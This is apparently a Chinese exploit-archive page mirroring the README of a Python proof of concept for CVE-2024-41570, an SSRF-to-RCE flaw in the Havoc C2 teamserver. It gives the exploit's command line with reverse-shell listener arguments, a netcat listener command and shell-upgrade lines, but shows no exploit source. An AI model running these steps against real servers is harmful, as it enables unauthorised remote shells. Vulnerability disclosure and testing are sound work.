POC详情: b82537a7d0a3940037eb8014c7f3e804d75b4233

来源
关联漏洞
标题: Havoc 安全漏洞 (CVE-2024-41570)
描述:Havoc是Havoc Framework开源的一个现代且可扩展的开发后命令和控制框架。 Havoc 2 0.7版本存在安全漏洞,该漏洞源于demon回调处理中存在未经身份验证的服务端请求伪造漏洞,允许攻击者发送来自团队服务器的任意网络流量。
描述
Automated Reverse Shell Exploit via WebSocket | Havoc-C2-SSRF with RCE
介绍
# CVE-2024-41570 | Havoc C2 SSRF with RCE | Automated Reverse Shell Exploit via WebSocket

This project provides a Python-based proof-of-concept (PoC) script to exploit a vulnerable WebSocket-based service. The script automates agent registration, WebSocket payload delivery, and remote command execution to establish a reverse shell.

## Features
- Registers an agent to the target service.
- Opens a WebSocket and sends handshake and authentication payloads.
- Executes commands remotely via a reverse shell.
- Provides a guided workflow with clear instructions.

## Prerequisites
- Python 3.x installed on your machine.
- Install required dependencies by running:
  ```bash
  pip install -r requirements.txt
  ```

## Installation
1. Clone this repository:
   ```bash
   git clone https://github.com/<your-repo-name>.git
   ```
2. Navigate to the project directory:
   ```bash
   cd CVE-2024-41570
   ```
3. Install dependencies:
   ```bash
   pip install -r requirements.txt
   ```

## Usage
Run the script with the required arguments:

```bash
python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>
```

### Arguments
- `-t`: Target URL of the WebSocket server.
- `-i`: IP address of the Team Server form Havoc.
- `-p`: Port for the Team Server from Havoc.
- `-U`: Username for WebSocket authentication.
- `-P`: Password for WebSocket authentication.
- `-l`: Listener IP for the reverse shell (your machine).
- `-L`: Listener port for the reverse shell (your machine).

### Example Command
```bash
python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444
```

### Steps to Execute
1. Ensure the target service is running and vulnerable.
2. Run the script with the required parameters.
3. In a separate terminal, start a listener:
   ```bash
   nc -lvnp <listener_port>
   ```
4. Upgrade shell:
    ```
    python -c 'import pty; pty.spawn("/bin/bash")' 
    export TERM=xterm-256color
    stty rows 67 columns 318
    ```
## Dependencies
The script requires the following Python libraries:
- `requests`
- `pycryptodome`

Install them using the command:
```bash
pip install -r requirements.txt
```

## Security Notice
This script is intended for educational purposes only. Ensure you have explicit authorization to test the target system. Misuse of this script may violate laws and ethical guidelines.

## References
Inspired by [Default Havoc Poc](https://github.com/chebuya/Havoc-C2-SSRF-poc)

## Contributing
Contributions are welcome! Feel free to fork the repository and submit a pull request.

## License
This project is licensed under the MIT License. See the LICENSE file for details.


文件快照

[4.0K] /data/pocs/b82537a7d0a3940037eb8014c7f3e804d75b4233 ├── [9.2K] exploit.py ├── [1.0K] LICENSE ├── [2.7K] README.md └── [ 60] requirements.txt 0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。